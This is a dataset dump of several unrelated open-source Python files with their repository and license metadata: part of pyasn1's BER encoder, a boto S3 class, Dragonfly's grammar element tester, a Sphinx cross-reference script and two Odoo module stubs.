            elif subid < 0 or subid > 0xFFFFFFFF:
                raise error.PyAsn1Error(
                    'SubId overflow %s in %s' % (subid, value)
                    )
            else:
                # Pack large Sub-Object IDs
                res = (subid & 0x7f,)
                subid = subid >> 7
                while subid > 0:
                    res = (0x80 | (subid & 0x7f),) + res
                    subid = subid >> 7
                # Add packed Sub-Object ID to resulted Object ID
                octets += res

        return ints2octs(octets), 0
class RealEncoder(AbstractItemEncoder):
    """Encodes ASN.1 REAL values (X.690 8.5).

    Handles the infinity special values, the base-10 character form (NR3)
    and the normalised base-2 binary form.
    """
    def encodeValue(self, encodeFun, value, defMode, maxChunkSize):
        if value.isPlusInfinity():
            return int2oct(0x40), 0  # PLUS-INFINITY special value
        if value.isMinusInfinity():
            return int2oct(0x41), 0  # MINUS-INFINITY special value
        m, b, e = value
        if not m:
            return null, 0  # zero encodes as empty contents
        if b == 10:
            # Base-10 character form, NR3 (X.690 8.5.8)
            return str2octs('\x03%dE%s%d' % (m, e == 0 and '+' or '', e)), 0
        elif b == 2:
            fo = 0x80  # binary enoding
            if m < 0:
                fo = fo | 0x40  # sign bit
                m = -m
            while int(m) != m:  # drop floating point
                m *= 2
                e -= 1
            while m & 0x1 == 0:  # mantissa normalization
                m >>= 1
                e += 1
            # Encode the exponent as a minimal big-endian two's complement
            # integer. Bug fix: the original right-shifted `e` until it hit
            # zero, which never happens for a negative exponent (>> sticks
            # at -1), so any fractional value such as 0.5 hung the encoder,
            # and e == 0 produced no exponent octets at all.
            eoctets = []
            ev = e
            while 1:
                eoctets.insert(0, ev & 0xff)
                ev = ev >> 8
                if ev == 0 and not (eoctets[0] & 0x80):
                    break  # non-negative, sign bit clear: minimal form
                if ev == -1 and (eoctets[0] & 0x80):
                    break  # negative, sign bit set: minimal form
            eo = ints2octs(eoctets)
            n = len(eo)
            if n > 0xff:
                raise error.PyAsn1Error('Real exponent overflow')
            if n == 1:
                pass
            elif n == 2:
                fo |= 1
            elif n == 3:
                fo |= 2
            else:
                # Long form: bits 1..0 == 3 and the next contents octet
                # carries the exponent length (X.690 8.5.6.4 d).
                # Bug fix: the original wrote int2oct(n//0xff+1) -- i.e.
                # almost always 0x01 -- instead of the actual length n.
                fo |= 3
                eo = int2oct(n) + eo
            po = null
            while m:
                po = int2oct(m & 0xff) + po
                m = m >> 8
            substrate = int2oct(fo) + eo + po
            return substrate, 0
        else:
            raise error.PyAsn1Error('Prohibited Real base %s' % b)
class SequenceEncoder(AbstractItemEncoder):
    """Encodes SEQUENCE/SET: concatenates component encodings, skipping
    absent OPTIONAL components and components equal to their DEFAULT."""
    def encodeValue(self, encodeFun, value, defMode, maxChunkSize):
        value.setDefaultComponents()
        value.verifySizeSpec()
        # Walk components last-to-first, prepending each encoding.
        substrate = null; idx = len(value)
        while idx > 0:
            idx = idx - 1
            if value[idx] is None:  # Optional component
                continue
            component = value.getDefaultComponentByPosition(idx)
            if component is not None and component == value[idx]:
                # Component equals its DEFAULT -- not encoded.
                continue
            substrate = encodeFun(
                value[idx], defMode, maxChunkSize
                ) + substrate
        return substrate, 1
class SequenceOfEncoder(AbstractItemEncoder):
    """Encodes SEQUENCE OF / SET OF by concatenating the encodings of all
    components in order."""
    def encodeValue(self, encodeFun, value, defMode, maxChunkSize):
        value.verifySizeSpec()
        # Encode components last-to-first, prepending each one, so the
        # resulting substrate ends up in component order.
        substrate = null
        for idx in range(len(value) - 1, -1, -1):
            substrate = encodeFun(value[idx], defMode, maxChunkSize) + substrate
        return substrate, 1
class ChoiceEncoder(AbstractItemEncoder):
    """Encodes CHOICE by encoding whichever alternative is currently set."""
    def encodeValue(self, encodeFun, value, defMode, maxChunkSize):
        return encodeFun(value.getComponent(), defMode, maxChunkSize), 1
class AnyEncoder(OctetStringEncoder):
    """Encodes ANY: the value already holds a complete encoding, emitted
    verbatim (constructed flag set only in indefinite mode)."""
    def encodeValue(self, encodeFun, value, defMode, maxChunkSize):
        return value.asOctets(), defMode == 0
tagMap = {
eoo.endOfOctets.tagSet: EndOfOctetsEncoder(),
univ.Boolean.tagSet: IntegerEncoder(),
univ.Integer.tagSet: IntegerEncoder(),
univ.BitString.tagSet: BitStringEncoder(),
univ.OctetString.tagSet: OctetStringEncoder(),
univ.Null.tagSet: NullEncoder(),
univ.ObjectIdentifier.tagSet: ObjectIdentifierEncoder(),
univ.Enumerated.tagSet: IntegerEncoder(),
univ.Real.tagSet: RealEncoder(),
# Sequence & Set have same tags as SequenceOf & SetOf
univ.SequenceOf.tagSet: SequenceOfEncoder(),
univ.SetOf.tagSet: SequenceOfEncoder(),
univ.Choice.tagSet: ChoiceEncoder(),
# character string types
char.UTF8String.tagSet: OctetStringEncoder(),
char.NumericString.tagSet: OctetStringEncoder(),
char.PrintableString.tagSet: OctetStringEncoder(),
char.TeletexString.tagSet: OctetStringEncoder(),
char.VideotexString.tagSet: OctetStringEncoder(),
char.IA5String.tagSet: OctetStringEncoder(),
char.GraphicString.tagSet: OctetStringEncoder(),
char.VisibleString.tagSet: OctetStringEncoder(),
char.GeneralString.tagSet: OctetStringEncoder(),
char.UniversalString.tagSet: OctetStringEncoder(),
char.BMPString.tagSet: OctetStringEncoder(),
# useful types
useful.GeneralizedTime.tagSet: OctetStringEncoder(),
useful.UTCTime.tagSet: OctetStringEncoder()
}
# Type-to-codec map for ambiguous ASN.1 types
typeMap = {
univ.Set.typeId: SequenceEncoder(),
univ.SetOf.typeId: SequenceOfEncoder(),
univ.Sequence.typeId: SequenceEncoder(),
univ.SequenceOf.typeId: SequenceOfEncoder(),
univ.Choice.typeId: ChoiceEncoder(),
univ.Any.typeId: AnyEncoder()
}
class Encoder:
    """Top-level BER encoder: resolves a value to a concrete item encoder
    and delegates, recursing via itself for nested components."""
    def __init__(self, tagMap, typeMap={}):
        # NOTE(review): mutable default is safe here -- the map is stored
        # and only ever read.
        self.__tagMap = tagMap
        self.__typeMap = typeMap

    def __call__(self, value, defMode=1, maxChunkSize=0):
        tagSet = value.getTagSet()
        if len(tagSet) > 1:
            # More than one tag -> explicit tagging wrapper.
            concreteEncoder = explicitlyTaggedItemEncoder
        else:
            # Ambiguous types (Set vs SetOf, ...) resolve by typeId first,
            # then by exact tag set, then by the base type's tag set.
            if value.typeId is not None and value.typeId in self.__typeMap:
                concreteEncoder = self.__typeMap[value.typeId]
            elif tagSet in self.__tagMap:
                concreteEncoder = self.__tagMap[tagSet]
            else:
                baseTagSet = value.baseTagSet
                if baseTagSet in self.__tagMap:
                    concreteEncoder = self.__tagMap[baseTagSet]
                else:
                    raise Error('No encoder for %s' % value)
        return concreteEncoder.encode(
            self, value, defMode, maxChunkSize
            )

# Module-level convenience instance.
encode = Encoder(tagMap, typeMap)
| gpl-3.0 |
Jgarcia-IAS/SAT | openerp/addons-extra/odoo-pruebas/odoo-server/addons/membership/__init__.py | 441 | 1101 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import membership
import wizard
import report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
serviceagility/boto | boto/s3/prefix.py | 237 | 1661 | # Copyright (c) 2006,2007 Mitch Garnaat http://garnaat.org/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
class Prefix(object):
    """A common-prefix entry from an S3 bucket listing, populated by the
    SAX-style start/endElement callbacks during XML parsing."""

    def __init__(self, bucket=None, name=None):
        self.bucket = bucket
        self.name = name

    def startElement(self, name, attrs, connection):
        # No nested elements to delegate parsing to.
        return None

    def endElement(self, name, value, connection):
        # The <Prefix> element carries this object's name; any other
        # element becomes a plain attribute.
        if name == 'Prefix':
            self.name = value
        else:
            setattr(self, name, value)

    @property
    def provider(self):
        """The provider of the owning bucket's connection, or None."""
        if self.bucket and self.bucket.connection:
            return self.bucket.connection.provider
        return None
| mit |
synkarius/dragonfly | dragonfly/test/element_tester.py | 5 | 7355 | #
# This file is part of Dragonfly.
# (c) Copyright 2007, 2008 by Christo Butcher
# Licensed under the LGPL.
#
# Dragonfly is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Dragonfly is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with Dragonfly. If not, see
# <http://www.gnu.org/licenses/>.
#
"""
Tools for testing element classes
============================================================================
"""
import logging
from dragonfly import *
from ..test import TestError, RecognitionFailure
from ..test.infrastructure import Unique
#===========================================================================
class ElementTester(Grammar):
    """Grammar wrapper for testing a single dragonfly element.

    Loads a one-rule grammar around the element, mimics a recognition of
    the given words, and returns the element's parsed value (or
    RecognitionFailure when the engine rejects the utterance).
    """

    _log = logging.getLogger("test.element")
    # Sentinel meaning "the recognition callback never fired".
    _NotSet = Unique("NoRecognition")

    class _ElementTestRule(Rule):
        exported = True
        def process_recognition(self, node):
            self.grammar._process_recognition(node)

    #-----------------------------------------------------------------------

    def __init__(self, element, engine=None):
        Grammar.__init__(self, self.__class__.__name__, engine=engine)
        rule = self._ElementTestRule("rule", element)
        self.add_rule(rule)

    def recognize(self, words):
        """Mimic recognition of `words` and return the element's value."""
        if isinstance(words, basestring):
            words = words.split()

        # Load on demand; remember whether we should unload afterwards.
        if not self.loaded:
            self._log.debug("Loading ElementTester instance.")
            self.load()
            unload_after_recognition = True
        else:
            unload_after_recognition = False

        self._recognized_value = self._NotSet
        try:
            # Make this grammar exclusive; this *probably* avoids other
            # grammars from being active and receiving the mimicked
            # recognition.
            self.set_exclusiveness(True)

            # Mimic recognition.
            try:
                mimic_method = self._mimic_methods[self.engine.name]
                mimic_method(self, words)
            except MimicFailure, e:
                self._recognized_value = RecognitionFailure
            except Exception, e:
                self._log.exception("Exception within recognition: %s" % (e,))
                raise
        except Exception, e:
            self._log.exception("Exception during recognition: %s" % (e,))
            raise
        finally:
            if unload_after_recognition:
                try:
                    self.unload()
                except Exception, e:
                    raise TestError("Failed to unload grammar: %s" % e)

        # If recognition was successful but this grammar did not
        # receive the recognition callback, then apparently some other
        # grammar hijacked it; raise a TestError to signal this
        # undesired situation.
        if self._recognized_value == self._NotSet:
            self._log.error(u"Recognition hijacked. (Words: %s)" % (words,))
            raise TestError(u"Recognition hijacked. (Words: %s)" % (words,))

        # Return the value of the element after recognition.
        return self._recognized_value

    def _process_recognition(self, node):
        # Recognition callback: capture the element's value for recognize().
        element_node = node.children[0]
        self._recognized_value = element_node.value()

    #-----------------------------------------------------------------------
    # Engine-specific logic.

    # Maps engine name -> mimic implementation; populated below.
    _mimic_methods = {}

    def _mimic_natlink(self, words):
        self.engine.mimic(words)
    _mimic_methods["natlink"] = _mimic_natlink

    def _mimic_sapi5(self, words):
        # SAPI5 delivers results asynchronously through the Windows message
        # queue, so mimic() must be followed by a message pump until either
        # a recognition arrives or a watchdog timer fires.
        import time
        import win32con
        from ctypes import (windll, pointer, WinError, Structure,
                            c_int, c_uint, c_long)

        class POINT(Structure):
            _fields_ = [('x', c_long),
                        ('y', c_long)]
        class MSG(Structure):
            _fields_ = [('hwnd', c_int),
                        ('message', c_uint),
                        ('wParam', c_int),
                        ('lParam', c_int),
                        ('time', c_int),
                        ('pt', POINT)]

        class Obs(RecognitionObserver):
            _log = logging.getLogger("SAPI5 RecObs")
            status = "none"
            def on_recognition(self, words):
                self._log.debug("SAPI5 RecObs on_recognition(): %r" % (words,))
                self.status = "recognition: %r" % (words,)
            def on_failure(self):
                self._log.debug("SAPI5 RecObs on_failure()")
                self.status = "failure"
        observer = Obs()
        observer.register()

        self._log.debug("SAPI5 mimic: %r" % (words,))
        self.engine.mimic(words)

        # Watchdog: WM_TIMER breaks the message loop after `timeout` secs.
        timeout = 10
        NULL = c_int(win32con.NULL)
        if timeout != None:
            begin_time = time.time()
            timed_out = False
            windll.user32.SetTimer(NULL, NULL, int(timeout * 1000), NULL)

        message = MSG()
        message_pointer = pointer(message)
        while (not timeout) or (time.time() - begin_time < timeout):
            if timeout:
                self._log.debug("SAPI5 message loop: %s sec left" % (timeout + begin_time - time.time()))
            else:
                self._log.debug("SAPI5 message loop: no timeout")

            if windll.user32.GetMessageW(message_pointer, NULL, 0, 0) == 0:
                msg = str(WinError())
                self._log.error("GetMessageW() failed: %s" % msg)
                raise EngineError("GetMessageW() failed: %s" % msg)

            self._log.debug("SAPI5 message: %r" % (message.message,))
            if message.message == win32con.WM_TIMER:
                # A timer message means this loop has timed out.
                self._log.debug("SAPI5 message loop timed out: %s sec left" % (timeout + begin_time - time.time()))
                timed_out = True
                break
            else:
                # Process other messages as normal.
                self._log.debug("SAPI5 message translating and dispatching.")
                windll.user32.TranslateMessage(message_pointer)
                windll.user32.DispatchMessageW(message_pointer)

            if self._recognized_value != self._NotSet:
                # The previous message was a recognition which matched.
                self._log.debug("SAPI5 message caused recognition.")
                break

        observer.unregister()

        if self._recognized_value == self._NotSet:
            if observer.status == "failure":
                raise MimicFailure("Mimic failed.")
            elif observer.status == "none":
                raise MimicFailure("Mimic failed, nothing happened.")
    _mimic_methods["sapi5"] = _mimic_sapi5
| lgpl-3.0 |
vipul-sharma20/oh-mainline | vendor/packages/kombu/docs/_ext/applyxrefs.py | 31 | 2136 | """Adds xref targets to the top of files."""
import sys
import os
testing = False
DONT_TOUCH = ('./index.txt', )
def target_name(fn):
    """Derive a Sphinx xref label from a .txt file path.

    Strips a trailing ".txt", removes leading "." / "/" characters, maps
    path separators to dashes and prefixes an underscore.
    """
    base = fn[:-4] if fn.endswith('.txt') else fn
    return '_' + base.lstrip('./').replace('/', '-')
def process_file(fn, lines):
    """Prepend the xref target for `fn` to `lines` and rewrite the file.

    I/O failures are reported and leave the file untouched (open failure)
    or partially written (write failure) -- best-effort by design.
    """
    # Insert in reverse order so the target line ends up first.
    lines.insert(0, '\n')
    lines.insert(0, '.. %s:\n' % target_name(fn))
    try:
        f = open(fn, 'w')
    except IOError:
        print("Can't open %s for writing. Not touching it." % fn)
        return
    try:
        f.writelines(lines)
    except IOError:
        print("Can't write to %s. Not touching it." % fn)
    finally:
        f.close()
def has_target(fn):
    """Return (skip, lines) for file `fn`.

    skip is True when the file already starts with an xref target, is
    empty, or cannot be read; otherwise lines holds the file's content.
    """
    try:
        f = open(fn, 'r')
    except IOError:
        print("Can't open %s. Not touching it." % fn)
        return (True, None)
    readok = True
    try:
        lines = f.readlines()
    except IOError:
        print("Can't read %s. Not touching it." % fn)
        readok = False
    finally:
        f.close()
    if not readok:
        return (True, None)

    if len(lines) < 1:
        print("Not touching empty file %s." % fn)
        return (True, None)
    if lines[0].startswith('.. _'):
        # First line is already an explicit target.
        return (True, None)
    return (False, lines)
def main(argv=None):
    """Walk the directory roots given in *argv*, adding an xref target
    to every .txt file that doesn't already have one.

    Defaults to sys.argv (i.e. the current directory when no roots are
    given). Returns None, so sys.exit(main()) exits with status 0.
    """
    if argv is None:
        argv = sys.argv
    if len(argv) == 1:
        # append, not extend: extend('.') only works because '.' is a
        # single character (extend iterates the string).
        argv.append('.')
    files = []
    for root in argv[1:]:
        for (dirpath, dirnames, filenames) in os.walk(root):
            files.extend([(dirpath, f) for f in filenames])
    files.sort()
    files = [os.path.join(p, fn) for p, fn in files if fn.endswith('.txt')]
    for fn in files:
        if fn in DONT_TOUCH:
            print("Skipping blacklisted file %s." % fn)
            continue
        target_found, lines = has_target(fn)
        if not target_found:
            if testing:
                # Dry run: lines[0] keeps its own newline, so suppress
                # print's. (Was a Python 2 trailing-comma print, which is
                # a syntax error under Python 3.)
                print('%s: %s' % (fn, lines[0]), end='')
            else:
                print("Adding xref to %s" % fn)
                process_file(fn, lines)
        else:
            print("Skipping %s: already has a xref" % fn)
if __name__ == '__main__':
sys.exit(main())
| agpl-3.0 |
kybriainfotech/iSocioCRM | addons/l10n_be_hr_payroll_account/__openerp__.py | 298 | 1626 | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2011 OpenERP SA (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Belgium - Payroll with Accounting',
'category': 'Localization',
'author': 'OpenERP SA',
'depends': ['l10n_be_hr_payroll', 'hr_payroll_account', 'l10n_be'],
'version': '1.0',
'description': """
Accounting Data for Belgian Payroll Rules.
==========================================
""",
'auto_install': True,
'website': 'https://www.odoo.com/page/accounting',
'demo': [],
'data':[
'l10n_be_wizard.yml',
'l10n_be_hr_payroll_account_data.xml',
'data/hr.salary.rule.csv',
],
'installable': True
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.